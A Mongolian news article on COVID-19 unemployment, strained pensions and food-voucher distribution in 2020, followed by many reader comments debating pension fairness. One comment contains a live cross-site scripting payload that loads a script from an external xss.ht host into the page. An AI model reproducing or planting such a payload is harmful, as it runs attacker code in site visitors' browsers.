Амьдралд нухлагдсан ахмадуудын тэтгэврээр АЖИЛГҮЙ ӨРХҮҮД АМЬ ЗОГООЖ байна
Манай улсад Коронавирусын улмаас хорио цээр тогтоод 100 гаруй хонож байна. Энэ хугацаанд аж ахуй нэгж болон хувийн хэвшил эдийн засгийн хүнд байдалд орж эхэлсэн.Тэд өөрсдөөсөө шалтгаалах бүхий л зүйлийг хийж нөхцөл боломжоо дайчилж ирсэн. Одоо төрөөс ААН болон иргэдийнхээ ажлын байрыг хамгаалахад чиглэсэн оновчтой шийдвэр гараасай гэдгийг иргэн бүхэн хүсэж байгаа. Гэвч гаргасан шийдвэр нь тэр бүр байндаа тусахгүй байна.
Ажилгүйдлын түвшингийн хувьд таван хүн тутмын нэг нь ажилгүй болохоор байгаа бөгөөд ойролцоогоор 50 орчим мянган хүн ажилгүйчдийн эгнээ рүү шилжиж байна. Дөрөвдүгээр сарын дунд үеэс эхлээд Монголын эдийн засгийн шинэ цикль эхэлдэг. Ерөнхийдөө 4-10 сар хүртэл эдийн засгийн гол салбарууд ажиллаж, 10-4 дүгээр сар хүртэл уналтад ордог. Иймээс компаниуд урт хугацаатай,хөнгөлөлттэй зээлийг хүсэж байгаа. Гэвч зээлийн хүүгийн дарамт өндөр тул компани дангаараа даван туулж чадахгүй. Иймд төр засгаас төсвийн тодотголтой холбоотой их хэмжээний үргүй зардлаа танаад хөнгөлөлттэй зээл болгож, ЖДҮ-гийн зээл болон ипотекийн зээлээ санхүүжүүлах шаардлагатай. Дотоодын хүнс үйлдвэрлэлээ дэмжих хэрэгтэй. Энэ хямралыг хувийн хэвшил дангаараа даван туулж чадахгүй учраас төр хамтраад ухаалаг шийдвэр гаргаж, даван туулах шаардлагатай гэдгийг эдийн засагчид хэлж байна.
2020 ОНЫ ЭХНИЙ ХАГАС ЖИЛД КОМПАНИУДЫН ОРЛОГО НЬ БУУРЧЭЭ
2020 оны гуравдугаар сард МҮХАҮТ-ын гишүүн болон гишүүн бус 1100 аж ахуйн нэгжийг судалгаанд хамруулжээ. Оролцогсдын 67 хувь нь Улаанбаатар хот, 33 хувь нь орон нутагт үйл ажиллагаа явуулдаг аж ахуйн нэгжүүд хамрагдсан байна. Компаниудыг салбараар ангилан харвал 25 хувь нь худалдаа, 22 хувь нь үйлчилгээ, 11 хувь нь хүнсний үйлдвэрлэлийн салбарын аж ахуйн нэгжүүд байсан.
Орлогын нөлөө: 2020 оны эхний хагас жилд компаниудын орлого буурчээ. Орлогын нөлөөг салбараар тодруулан авч үзвэл аялал жуулчлал, боловсрол, тээвэр, үйлчилгээ, хөнгөн үйлдвэрлэл, худалдаа, хүнсний үйлдвэрлэлүүдийн салбарын бизнес эрхлэгчдийн 55 хувь нь орлогын хэмжээ 30 хувь ба түүнээс дээш хэмжээгээр буурсан байжээ.
Бизнесийн хүндрэл: Бизнест үүсээд буй хүндрэлийн 66 хувь нь зээлийн эргэн төлөлт, зээлийн хугацаа, зээлийн хүү нь хамгийн их хүндрэлийг бий болгожээ. Үүнээс 22 хувьд нь түрээсийн төлбөр, 9 хувь нь төрийн үйлчилгээ (мэргэжлийн зөвлөлүүдийн хурал, гадаад худалдаа, зөвшөөрөлтэй холбогдох)-ний хүнд суртал, гурван хувь нь санхүүгийн эх үүсвэр бага байгаа нь хүндрэл учруулжээ.
МЭРГЭЖИЛТЭЙ ЗАЛУУС АЖИЛГҮЙЧҮҮДИЙН ЭГНЭЭНД ОЛНООРОО ШИЛЖСЭЭР Л…
Хөдөлмөрийн зах зээл жил бүр хүрээгээ тэлдэг. Харин манай улсад ийм зүйл тун ховор байдаг. Их, дээд сургууль төгссөн залуус ажил олгогчдоос татгалзсан хариу сонсож, ажилгүйчүүдийн эгнээнд шилжиж байна. Энэ хавар олон мянган шинэ төгсөгч ажлын талбар дээр гарна. Гэвч тэд улсын эдийн засгийг чирэх ажиллах хүч болж чадах эсэх нь эргэлзээтэй. Учир нь манайд боловсон хүчин бэлдэж буй сургуулиуд, хөдөлмөрийн зах зээл хоорондын уялдаа маш сул.
Ажил хийж буй төгсөгчдийн 30.4 хувь нь эзэмшсэн мэргэжлийнхээ үр ашгийг мэдэрч чадалгүй өөр салбарт зүтгэж байна. Харин 10 орчим хувь нь боловсролынхоо түвшнээс доогуур ур чадвар шаарддаг худалдагч, зөөгч, бармен, үйлчлэгч зэрэг ажил хийдэг. Мэргэжилтэй залуус ажилгүйчүүдийн эгнээнд олноороо шилжиж, нийгмийн хамгийн сул дорой давхаргыг улам зузааруулж байгаа нь харамсалтай. Энэ байдал өнгөрсөн жилүүдээс өнөөдрийг хүртэл үргэлжилж байгаа. Төр засгаас өгсөн хоосон амлалт иргэдийг хоосон горьдлого руу түлхдэг. Эх баригч МАН аймаг бүрт нэг үйлдвэр барьж өгнө гэж амалсан. Гэвч бодит байдалд нэг ч үйлдвэр баригдаагүй өнөөдрийг хүрлээ.
АЖИЛГҮЙ БОЛСОН АЙЛ ӨРХҮҮДИЙН ХАМАГ АЧАА АХМАДУУДЫН ТЭТГЭВЭР ДЭЭР УНАВ
Эдийн засаг хүндэрч аж ахуй нэгж байгууллагууд ажилчдаа цомхотгож эхэлсэн. Ажилгүй болсон залуучууд амьдралаа залгуулах гэж аав, ээжийн тэтгэвэрт найдаж байна. Нэг хүний тэтгэврээр бүтэн бүл амьдралаа залгуулахад маш хүндрэлтэй. Ерөнхийдөө ажилгүй болсон айл өрхийн хамаг ачаа ахмадуудын тэтгэвэр төвлөрсөн. Одоогийн тэтгэврийн доод хэмжээ 350.0 мянга, дундаж тэтгэвэр 409.0 мянган төгрөг байгаа. Хэдийгээр тэтгэвэр нэмэгдсэн нэртэй боловч бодит амьдрал дээр хаанаа ч хүрэхгүй байгаа гэдгийг ахмадууд хэлж байна.
Дархан-Уул аймгийн иргэн Г.Харнүдэн “Сардаа 350 мянган төгрөгийн тэтгэврийн авдаг. Хоол ундаа авахаас илүүтэй даралтын эм, элэгний эм зэрэгтээ зарцуулаад бараг дуусдаг. Бага тэтгэвэр авдаг хүмүүс тэтгэврийн мөнгөөр амьдарна гэсэн ойлголт байхгүй. Ядаж тэтгэврийн доод хэмжээг 500 мянган төгрөг болгох хэрэгтэй. Өндөр тэтгэвэр авдаг, бага тэтгэвэр авдаг хүмүүс хоёр чинь тэнгэр газар шиг ялгаатай” гэв.
ХҮНСНИЙ ТАЛОН ӨГНӨ ГЭСЭН БОЛОВЧ ТАНИЛТАЙД НЬ ОЛДОЖ, ЯДАРСАН ЗУТАРСАНД НЬ ОЛДОГГҮЙ
Манай улс амьжиргааны түвшин доогуур иргэддээ хүнсний талон олгодог болоод багагүй хугацаа өнгөрсөн. 2013 оноос хойш хэрэгжиж эхэлсэн уг хөтөлбөрт одоогийн байдлаар 44325 өрх хамрагддаг байна. Өөрөөр хэлбэл, нийслэл болон орон нутгийн 44325 өрхийн 240 мянган иргэн хүнс, тэжээлийн эрхийн бичгээр амь зууж байгаа аж. Иргэд талоноороо мах, сүү, гурил, өндөг, хүнсний ногоо, хүүхдийн будаа, жимс жимсгэнэ зэрэг арван нэр төрлийн бараа худалдаж авах эрхтэй.
Ингэхдээ хүнсний талоныг хүүхдэд 8000, том хүнд 16000 төгрөгөөр тооцож, өргөн хэрэглээний бараа бүтээгдэхүүн авдаг байна. Нэн ядуу, эмзэг бүлгийн гэх тодотголтой өрхийн амьжиргааны түвшин тогтоох судалгаагаар нийслэлд амьдарч байгаа өрх 310, орон нутгийн иргэн 291.5-аас доош үнэлгээтэй гарсан тохиолдолд хүнсний талон авдаг юм байна. Хүнсний талон хүрэх ёстой эзэндээ хүрч байгаа, эсэх нь эргэлзээтэй.
Олон хүүхэдтэй өрх толгойлсон, эрхэлсэн тодорхой ажилгүй, амьжиргааны түвшин доогуур болон хөгжлийн бэрхшээлтэй иргэдэд олгодог хүнсний талон очих ёстой эзэндээ хүрдэггүй гэх мэдээлэл бий.
Өрхийн амьжиргааны түвшин тогтоох судалгааг дөрвөн жилд нэг удаа явуулж, босго оноо ХХҮЕГ-т бодогдоод ийм айлууд талонд хамрагдана гэдэг юм байна. Хэрэв босго онооноос доош оноотой байх юм бол хүнсний талонд хамрагдах боломжтой юм. Хэдийгээр босго оноо нь доогуур ч хүнсний талон авч чадахгүй байгаа айлууд нийслэлд нэлээд бий гэдгийг албаны хүмүүс хэлж байна.
Эрхэлсэн тодорхой ажилгүй, хүүхдийн мөнгөнөөс өөр санхүүгийн үүсвэргүй иргэдээ амьжиргааны түвшин “аятайхан” гээд хүнсний талонаас хасаад байдаг улс манайхаас өөр байдаггүй. Харин амьдралын боломжтой хүмүүс хүнсний талонаар хүнс авдаг гэдгийг иргэд хэлж байна. Нэг үгээр хэлбэл танилтай хүнсний талон өгнө гэсэн боловч танилтайд нь олдож, ядарсан цутарсанд нь олдоггүй юм байна.
Сэтгэгдэл
ZAP [202.9.40.50] 2021-05-05 05:53:43
ZAP [202.9.40.50] 2021-05-05 05:53:43
Zochin [192.82.93.3] 2020-05-11 13:16:06
Bolimoor um aa. Ajil torol golohgui hiigeech ee. Ingej amidrahaasaa ichdeggui um uu.
Зочин [203.91.115.47] 2020-05-09 15:19:56
Бүрэн тэтгэвэрийн доод хэмжээ 350 мянга дэндүү бага бна Эмэндээ ч хүрэхгүй байна Ядаж 500 мянга болгоочээ МАН аа
Зочин [59.153.87.211] 2020-05-09 10:14:41
Хөгшчүүд рүү дайраад давшлаад байгаа малнууд та нарын үе ирэхээр амиа хорлоцгоох байх даа яагаад гэвэл та нар хөдөлмөр гэж юу байдгийг мэдэх ч үгүй хүүхэд цувуулж төрөөс мөнгө нэхсэн авгай нар, архинд живсэн нөхрүүд яана даа.
Зочин [103.80.210.183] 2020-05-11 02:20:06
одоо ажиллаж байгаа та нарын тэтгэвэр авах ёстой сангийн мөнгийг МАНГАС ундармаа гишүүн идээд баардаад козинодоод устгачихсан. тэрнээс тэтгэвэрээ нэхэх ээ л бод.
Иргэн [103.26.194.123] 2020-05-08 14:57:09
Цэвэрлэгч дарга хийж байсан 2 хүний тэтгэврийг тэгшгитгэж адилхан ав гэж тэнэгтээд бгаа юмуу.бүү тэнэгт авдаг цалин хийдэг ажил 2 тэс ондоо ндш төлсөн нь тэс өөр хэзээч тийм юм байдагүй юм эргүү малуудаа.
[103.80.210.183] 2020-05-11 02:21:59
тэтгэвэрийг малаар өгдөг болоё.
Зочин [103.10.23.106] 2020-05-09 04:17:18
Цэвэрлэгч хүн дарагаас илүү их хүнд хөдөлмөр хиж байгаа хүмүүс Дарга бол тийм хүнд хүчэр аил биш юм шүү Өнөөгийн дарга нар бол хахуулч хулгайч нар байдаг АЖИЛЧИН ХҮН НИЙГЭМИИЙН БАЯЛАГЫН ӨӨРИЙН ГАРААР ХИЙЖ БҮТЭЭДЭГ ЯМАРЧ ХАХУУЛЬ АВДАГҮЙ ХҮМҮҮС ТЭТГЭВ БОЛ БҮХ ХҮНД АДИЛ ТЭГШ БАЙХ ЁСТОЙ ТЭТГЭВРИИЙН ОДОО НЭМЭХ ХЭРЭГТЭЙ МӨНГӨНИЙ ХАНАШ ИХ УНСАН ШҮҮ ДЭЭ ТЭТВЭГРИЙН 350 МЯНГА АМАНД Ч ҮГҮЙ ХАМАРТ Ч ҮГҮЙ БОЛОЖ ТӨГРӨГ ЧИХЭРИЙН ЦААС БОЛСОН БАЙНА
Зочин [103.10.21.30] 2020-05-09 03:46:10
40жил ажилласан инженер 350000 төг тэтгэвэр авч байгаагах бичсэн байна Гэтэл тэтгэвэрийн доод хэмжээг 2 удаа 100000 р нэмээд 420000 болгосон Үүнийг юу гэж ойлгох вэ Ийм байдлаар тэтгэвэр нь доошоо орсон олон зуун.ахмад байна 420000 төг .н тэтгэвэр авч байгаа хүмүүс чинь тэтгэврийн доод хэмжээгээр тэтгэвэр тогтоолгож байсан хүмүүс ....Тухайн үедээ тэднээс өндөр тэтгэвэр авч байсан багш эмч инженер өөр бусад ажил хийж байсан хүмүүс зуу зуун мянгаар тэтгэвэрийн доод хэмжээг нэмснээс болж хохироод байна Үүнийг яаж засах вэ
зочин [124.44.156.207] 2020-05-08 14:44:19
Байгалийн олон төрлийн баялагтай, 70 гаруй сая малтай, Монголын өргөн уудам говь хангай тал хосолсон сайхан нутагт гуравхан сая ард түмнийг яаж ядуу тарчиг, өлсгөлөн, өвчтэй, өртэй зээлтэй, оюуны хоосролтой, хомсдолтой, ажил эрхлэхгүй зөвхөн халамж мөнгө хүлээсэн, архин далайд живсэн, буурай дорой байлгаж туйлдуулж, бадар барьж болдгийн жишээг Монгол улсын Төр засаг, гишүүд сайд дарга нар дэлхийд харуулж сурталчилж байгаа юм болов уу? Эгэл жирийн Монголчуудын минь хувь заяа, төөрөг тавилан арай ийм биш байлтай.
Зочин [103.10.21.30] 2020-05-08 14:35:18
Эзэмшсэн мэргэжил хашсан ажил албаас хамаарч авдаг цалин их бага хөдөлмөрлөсөн жил төлсөн татвараас хамаарч тэтгэвэр их бага тогтоно...Мөн хашсан ажил албаас хамаарч гүйцэтгэл бас янз бүр Эмч сувилагч үйлчлэгч энэ 3 ажлыг харьцуулашгүй тиймээс тэтгэвэр бас харьцуулашгүй байх ёстой ....Мөн дарга нягтлан цэвэрлэгч бас л харьцуулашгүй тэтгэвээр бас л харьцуулашгүй байх ёстой гэх мэт Гэтэл одоо цагт бүгдийг эн тэнцүү болгох гэж зүтгээд байгаа нь сонин Манай ахмадууд би ямар ажил мэргэжилтэй билээ хэдэн жил ажилласан хэдэн төг.н цалингаас хэдэн төг.н татвар төлдөг байснаа бодож тунгаамаар ....ӨНДӨР ЦАЛИН АВЧ БАЙГАА ХҮН ӨНДӨР ТЭТГЭВЭР АВАХ ЁСТОЙ ....Цэвэрлэгч үйлчлэгч ажилгүй байсан хүмүүс өндөр тэтгэвэр авагчтай барьцаад байгаа ажиглагддаг.
Зочиг [103.57.92.71] 2020-05-08 13:49:29
Соц. Байна уу,Кап.байна уу ялгаагүй.Үр хүүхдээ заавал дээд мэрэгжил эзэмшүүлэх биш ,нийгэмшсэн, ёс суртхуунтай хүн болгож хүмүүжүүлэх хэрэгтэй.Тэгвэл тэтгэвэрээ булаалгахгүй.
БУРУУ ЦОЛМОН [103.10.23.106] 2020-05-09 04:24:18
ИРГЭН БҮРЭЭН ХУВИЙН ӨМЧТЭЙ ХУВИЙН АЖ АХУЙТАЙ ИРГЭН БҮРЭЭН ҮҮЛДВЭРЛЭГЧ БҮТЭЭГЧ БОЛОХ ЮМ БОЛ МОНГОЛ ХҮН БҮР ЭЗЭН БАЙЖ ГАДНААС АЖИЛЧАН АВЧ АЖИЛУУЛАЖ БАЯЛАГ БҮТЭЭЖ ЯМАРЧ ТЭТВЭГЭР ТӨРӨӨС НЭХЭДГҮЙ ТӨРД ӨГДӨГ БОЛНО ДААНЧ БҮХ БАЯЛАГЫГ УЛС ТӨРЧ ХЭМЭЭХ ЦӨӨН ХҮН ХУЛГАЙЛААД ИЙМ БОЛОЛЦООГ АРД ТҮМЭНД ОЛГОХГҮЙ ЮМ , УДААН ИЙМ БАЙХ ЮМ БОЛ АРД ТҮМЭН ЗЭВСЭГЛЭН БОСХОД ХҮРНЭ
ee [202.126.88.174] 2020-05-08 13:09:13
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://sadarbolzoo.xss.ht";parent.document.body.appendChild(a);</script>">
zochin [202.126.88.174] 2020-05-08 12:20:26
mongol uls mine hurdan hugjeerei
иргэн [122.201.31.117] 2020-05-08 11:55:06
Тэтгэвэрийн зээлгүй учир тэглүүлээгүй, тэтгэвэр 20.о мян-аар өссөн. Халамжинд хамрагдаагүй. ВАУЧЕР хэмээх эрээн цаасны сурагаас өөр юмгүй ахмадууд яах вэ???? Яагаад биднийг үлдээв???
Иргэн [66.181.161.56] 2020-05-08 11:21:13
Тэтгэвэрийн ялгаа хэт зөрөөтэй 40 жил ажил хийсэн инжёнёр би 350 авдаг би ганц биш миний мэдэх үё тэнгийнхэн тийм байгаа.өндөр тэтгэвэр тогтоолгосон нөхөд арын хаалга арга заль орсон л байхгүй юу .яг одоо гарч байгаа ахмадтай бол юу ярихав мэдэхгүй барьцахчгүй .
tusa [66.181.190.112] 2020-05-08 10:00:11
Тэтгэвэр зөрүүтэй нь өмнө хашиж байсан албатай холбоотой. Бүгдийг тэгшитгэвэл инженер, харуул хоёрын ажлын ялгаа гэж байхгүй. Хэн улсад илүү толгойгоо ажиллуулж хөдөлмөрлөсөн хүн мэдээж өндөр тэтгэвэр авч байгаа. Энийг ойлгохгүй нөхөр өмнө даргын алба хашиж байсан мэт аашилна. Энэ арай дэндэнэ ээ. Ажил, цалин голдог залуучууд цаашдаа яахыг таашгүй. Гэхдээ тэдэнд монгол ген, ухаан байгаа гэдгийг мартаж болохгүй.
Зочин [103.10.21.30] 2020-05-08 09:37:29
Тэтгэврийн доод хэмжээнээс хамаагүй хол зөрүүтэй байсан тэтгэвэр маань одоо тэтгэврийн доод хэмжээтэй адилхан шахуу боллоо СОЦ үед дунд тушаалын алба цэвэрлэгч хоёрын цалин хоорондоо их ялгаатай байсан Тэтгэвэрийг ч мөн ялгаатай тогтоосон Гэтэл тэтгэвэрийн доод хэмжээг дахин дахин нэмж шууд тэтгэврийн доод хэмжээний тэтгэвэр авдаг хүмүүсийн адил болголоо ЦАЛИНГААС СУУТГАДАГ БҮХ ТӨРЛИЙН ТАТВАР НЬ ЦАЛИНГИЙН ИХ БАГААС ХАМААРЧ ХЭН ИЛҮҮ ТАТВАР ТӨЛНӨ ТЭР ӨНДӨР ТЭТГЭВЭР АВАХ ЭРХТЭЙ БАЙМААР ....ГЭТЭЛ УЛСАД ТӨЛСӨН ТАТВАР НЬ БАГА ХҮМҮҮС ТЭТГЭВРИЙН ДООД ХЭМЖЭЭГЭЭР 420000 ТӨГ АВЧ БАЙНА ...ЭНЭ АРИУН ЯВДАЛ МӨН ҮҮ.....ХАМААГҮЙ ТЭГШИТГЭХ НЬ ОЛОН ЖИЛ ХӨДӨЛМӨРЛӨЖ ӨНДӨР ТАТВАР ТӨЛСӨН АХМАДУУДЫГ ХОХИРООЖ БАЙНА........УЁРАЛ ГИШҮҮНИЙ СОНОРТ ХҮРДЭГ Ч БОЛООСОЙ...ДУНДАЖ ТЭТГЭВЭР АВАГЧ БАЙСАН ХҮН ШУУД ДООШОО ГУЛСАЖ ТЭТГЭВРИЙН ДООД ХЭМЖЭЭНИЙ ТЭТГЭВЭР АВДАГ БОЛЖ МАШ ИХЭЭР ХОХИРЧ МАШ ИХ ГОМДОЖ БАЙНА ...ТЭТГЭВЭРИЙГ ХАВТГАЙРУУЛЖ БИШ БОДИТ ХӨДӨЛМӨРЛӨСӨН ЖИЛ ТӨЛСӨН ТАТВАРТ НООГДУУЛЖ ШУДАРГААР ТОГТОО.....
Тэтгэврийн иргэн [103.229.123.192] 2020-05-09 02:57:56
Яг үнэн. Би НДШ олон жил өндөр хэмжээгээр төлж байсан. Гэтэл юу ч төлдөггүй байсан хүмүүстэй ойролцоо тэтгэвэр авч байгаа нь үнэхээр шударга биш. Хэн их шимтгэл төлнө тэр их тэтгэвэр авдаг зарчим алдагдаад удаж байна. Тэтгэвэр нэмэхдээ ч багад нь их, ихэд нь бага нэмэхээ зогсоо. Энэ бол шударга төлөгчийг хохироож, мөлжиж байгаа дарангуйлал шүү
Тэтгэвэр нэмэх боломж удахгүй алга болно.Идэх ам нь нэмэгдэх гэж байна. [202.131.225.53] 2020-05-08 08:56:23
Одоо Европ, Солонгос, Америк болон Туркээс баахан монголчууд ирнэ. Коронавирусээс болж тэд буцахгүй. Тэд нар бас л тэтгэвэр, тэгэмж нэхнэ, тэгсэн мөртлөө тэд нийгмийн халамжийн санд ЕРӨӨСӨӨ хувиа ОРУУЛААГҮЙ байгаа. Улс тэднийг харж үзэхгүй бол болохгүй. Тэгээд бас л БИДНИЙ төлсөн цалингийн шимтгэлээс ТЭДЭНД тэтгэвэр тэтгэж олгоод эхэлнэ. Мурийцах уу? Ийм байхад манай өндөр настнуудын тэтгэврийг нэмнэ гэдэг юу л болдоо.
Зочин [103.26.193.34] 2020-05-08 08:10:24
Тэтгэврийнхэн ахиад мөнгүй болсон шүү дээ. 2 жилээр ахиад бараг 70 хувь зээл аваад зарчихсан бгаа. САЙН ТӨРТЭЙ БОЛОХООР ЯАХАВ???? АХИАД ТЭГЛЭХИЙГ ХҮЛЭЭЖ БГАА БОЛНОООО
Зочин [103.57.92.71] 2020-05-08 07:50:47
Тэтгэвэрээрээ хүүхдээ тэжээж байгаа бол хохь чинь гэж хэлмээр байна. Өлбөрч үхсэн ч эмээ өвөөгөөсөө тэт мөнгийг хумсаслах эрхгүй ...хүмүүжил олгож чадаагүй бол эмээ өвөө өөрөө буруутай....
Zochin [8.20.127.47] 2020-05-08 07:24:49
Odoo ajil amidralaa hewiin urgeljluulii bur dampuurch duuslaa
cara [66.181.171.26] 2020-05-08 06:50:18
tetgever yalgaatai ajillasan jileer nuuruur baix xeregtei
ок [192.82.73.184] 2020-05-08 06:18:28
би төр засгаа үнэхээр гайхдаг, яагаад залуучууддааа ажлын байрыг үй олноор нь бий болгохгүй, халамж, тэтгэмж байнга яричах юм, гэр бүлийн суурь хуулиууддаа чангатгаад, энэ олон эцэг эх нь эрүүл саруул байж, хүүхэдээ хаяад явсан хүмүүсээс данснаас нь мөнгө төгрөг авч өгч, архичин юмнуудын нь тусгай цэргийн лагерьт ажил хийлгэж, монгол хүмүүсээр ажил хийлгээчээ, ёстой ойлгохгүй юм , монгол хүний төр засаг юмуу, хаашаа юм ойлгохоо байгаад удаж байна шдээ, наад хөгшин залуугүй ядаж байхад сая төгрөгний цалинтай ажлын байрууд бий болгоочээ, барууны орнуудад 20-25 нас, 60 иас дээш насныханг ажлын байраар хангуул, тухайн компанид татварын хөнгөлөлт үзүүлдэг шдээ, шинээр старт ап хийж байгаа компаниудад эхний жилд нь татвар авдаггүй шдээ, төр засаг гаргаж байгаа шийдвэрүүд гэж үнэн 7н буудлын Должин эмээгээс долоон доор юмаа. нээх олон сая хүн амтай биш, хөгжлийн бэрхшээлтэй, хөдөлмөрийн насны хүмүүсээ ажлын байраар хангамаар байна, тэгээд насны бөгсөнд хангалттай мөнгөө авмаар байхын
Зочин [202.21.109.45] 2020-05-08 05:46:01
Тэтгэвэр тэглэж татвар төлөгчийн мөнгөөр тансаглах нь буруу байсан.Одоо болтол салхит ийн ордын мөнгө улсад орж ирээгүй.Ядуу байж сар бүр өгдөг мөнгийг яагаад бөөнд нь авах болсныг сайтар судлах ёстой байсан юм.Ар гэрт нь архины донтой хүн байна уу? ажилгүй хүүхэд нь машин авах гэж байна уу? судлах ёстой байсан юм.Одоо бүх юм өнгөрсөн Монгол Улс хар жагсаалтанд орчихсон.
Сүрмаа [59.153.113.171] 2020-05-10 06:26:12
Тэтгэврийн зээл тэглэх нь буруу байсан гэдэгтэй санал нийлж байна аа. Аминдаа 2020 оны сонгуулиар саналаа нэмэх гэсэн увайгүй, явуургүй арга байсан байх. Тэгвэл энэ чинь одоо огт үр дүнгүй зүгээр л хөрөнгө үрэн таран хийсэн ажил болсон шүү гэдгийг иөр засагт дуулгая даа
zochin [202.126.89.42] 2020-05-08 05:39:53
Zeeltei ahmaduud n tegluulee biz.Chinzorig bol tet iin nemegdeliig buruu olgoson.Nasaara ajil hiisen 30 aas deesh ajillasan hunii tet baga nemeed.barag ajillaagui nehen bichilteer jilee duusgasan humuust ender nemsen teneg said.Nasaara zutgesen n iluug hurteh baimaar.Denduu gehed denduu teneg shiidver.Odoo hurdan zailaasai.
Зочин [43.242.243.80] 2020-05-08 05:12:13
tetgeverees uur orlogogui humuus hetsuu bnaa
Зочин [43.242.243.80] 2020-05-08 05:12:05
tetgeverees uur orlogogui humuus hetsuu bnaa
zochin [202.126.89.23] 2020-05-08 04:46:41
Ter ve ene ve gej odoonii jvvhdvvd ih yarih um uur um ch bii tiim ih ih uurchlugdsun um zaluuchuudiin huvid haragdahgvi l um umsuj zvvh ideh uuh n l ih uur haragdah um harin hariltsaa handlaga hiih bvteeh uhamsaraa l uurchluh heregtei
Тэтгэврийн хүн [202.179.10.162] 2020-05-08 04:27:46
Тэтгэвэр тэглээгүй бол өнөөдөр олон хүн өвчилж үхэх байсан биз. Тэтгэвэр тэглэснийг буруу гэж яриад байгаа хүмүүс харгис араатнууд .Ядарсан ахмадуудаасаа юуг нь харамлаад байгаам.Тийм л сүрхий юм бол тэмцэх асуудал бишгүй л байна. Ахмадуудын нуруун дээрээс ачаа хөнгөрсөнд амь нь тэмцээд байна уу !
Зочин [150.129.143.25] 2020-05-08 03:56:02
Одоогийн хөгшчүүл бас ч гэж бага ч гэсэн тэтгэвэртэй. 90 ээд онд насанд хүрсэн хүмүүс одоо хөгширч байгаа ч тэтгэвэр авах хүн ховор. Тийм байхад НД хууль өөрчлөөд тэтгэврийн нас нэмээд малчдад хөнгөлөлт үзүүлээд байгаа. Одоо л үйл явдал эхэлнэ, болоогүй байна. Завсардсан үеийнхэн хоолгүй турж үхэх вийдээ.
Богии [202.9.46.9] 2020-05-08 02:35:10
Хүний төлөө амьдарч байгаа юм шиг байхаа болих хэрэгтэй . Ажил , хөдөлмөр тэнэг малуудаа.
Монгол [202.179.10.162] 2020-05-08 04:30:04
202.9.46.9, яг зөв хэллээ
Зочин [202.9.46.108] 2020-05-08 02:02:51
Хүүхэдтэй хүмүүс хөгширсөн хойноо ингээд хүүхдүүддээ дээрэлхүүлж дарамтлуулна суух байх даа.
Зочин [202.179.26.8] 2020-05-08 01:32:07
арчаагүй болоол тэр ш дээ яаж ч ядарсан эцэг эхийхээ тэтгэвэрээр амьдрахгүй байх үүрэгтэй шүү. ажилсаг хүн бол яаж ийгээл амьдарна шдээ. хэсэгхэн хугацааг даваал гарна. ямар хүний өмнөөс амьдарч байгаа биш
Зочин [202.9.46.108] 2020-05-08 02:11:14
Багаас нь зөв хүмүүжүүлээгүй байхгүй юу даа
иргэн [192.82.66.151] 2020-05-08 01:18:35
Хорооны хэсгийн ахлагч нарт л хамаг учир байгаа.Эд нар л талонаар бизнесс улстөр хийгээд явж байдаг.Баянгол дүүргийн 22-р хорооны хэсгийн ахлагч нар АН-г дэмждэг хүмүүсэд талон өгдөг гэсэн.МАН-г дэмждэг буюу эсвэл хэл ам хийж чаддаггүй айлд өгдөггүй хорооны үйл ажиллагаанд оролцуулдаггүй харинч хүнд суртал гаргаж бичиг баримт авах гэхээр хийж өгдөггүй гэсэн.Ийм үг үйлдэл газар бүр байгаад НХХЯам анхаарч энэ балиар үйлдлийг зогсоож хариуцлага тооцож эзэнд талон нь хүрдэг болгомоор байна.Хэсгийн ахлагч гэж улстөржсөн нөхдүүд байна шүү ЕСайдаа.
Зочин [64.119.21.248] 2020-05-08 01:01:05
30 жилийн систёмийн хямрал сүйрэл
БОДЛЫН ХУЛГАЙЧ [66.181.167.53] 2020-05-08 00:41:19
ТӨР ТИЙМ Л ИХ МӨНГӨТЭЙ ЮМ БОЛ АХМАДУУДЫН ТЭТГЭВРИЙГ 500,000-Р НЭМЧИХЭЭЧ. ТЭД ХИЙХ ЮМАА ХИЙЧИХСЭН ХҮМҮҮС ШҮҮ ТА НАРЫГ БОДОХОД....................
тэтгэвэр тэглэсэн нь алдаа байсан. [103.26.193.226] 2020-05-08 03:45:28
Тэтгэвэр тэглэж 900 тэрбум төг үгүй болсон. Тэтгэвэр хэзээ ч ялгаатай байдаг юм шүү дээ.0гт ажил хийгээгүй эсвэл бага цалинтай алдаг хоног хиыж байсан хүмүүс бага тэтгэвэр авдаг юм.30 жил уурхайд ажилсан 30-40 жил эмнэлэг сургууль 25 дээш жил цагдаа цэрэг хүчний байгууллагд ажиллаж тэтгэвэр тогтоолгосон хүмүүс арай илүү байдаг тэтгэвэр хэзээ ч тэгштгэж болдоггүй учир нь эндээ байдаг энэ хүмүүс нийгмийн даатгалаа тасралтгүй 25-40 өгсөн юм.х
тэтгэвэр тэглэсэн нь алдаа байсан. [103.26.193.226] 2020-05-08 03:41:58
Тэтгэвэр тэглэж 900 тэрбум төг үгүй болсон. Тэтгэвэр хэзээ ч ялгаатай байдаг юм шүү дээ.0гт ажил хийгээгүй эсвэл бага цалинтай алдаг хоног хиыж байсан хүмүүс бага тэтгэвэр авдаг юм.30 жил уурхайд ажилсан 30-40 жил эмнэлэг сургууль 25 дээш жил цагдаа цэрэг хүчний байгууллагд ажиллаж тэтгэвэр тогтоолгосон хүмүүс арай илүү байдаг тэтгэвэр хэзээ ч тэгштгэж болдоггүй учир нь эндээ байдаг энэ хүмүүс нийгмийн даатгалаа тасралтгүй 25-40 өгсөн юм.х
тэтгэвэр тэглэсэн нь алдаа байсан. [103.26.193.226] 2020-05-08 03:41:22
Тэтгэвэр тэглэж 900 тэрбум төг үгүй болсон. Тэтгэвэр хэзээ ч ялгаатай байдаг юм шүү дээ.0гт ажил хийгээгүй эсвэл бага цалинтай алдаг хоног хиыж байсан хүмүүс бага тэтгэвэр авдаг юм.30 жил уурхайд ажилсан 30-40 жил эмнэлэг сургууль 25 дээш жил цагдаа цэрэг хүчний байгууллагд ажиллаж тэтгэвэр тогтоолгосон хүмүүс арай илүү байдаг тэтгэвэр хэзээ ч тэгштгэж болдоггүй учир нь эндээ байдаг энэ хүмүүс нийгмийн даатгалаа тасралтгүй 25-40 өгсөн юм.
Zochin [79.142.76.177] 2020-05-08 00:39:52
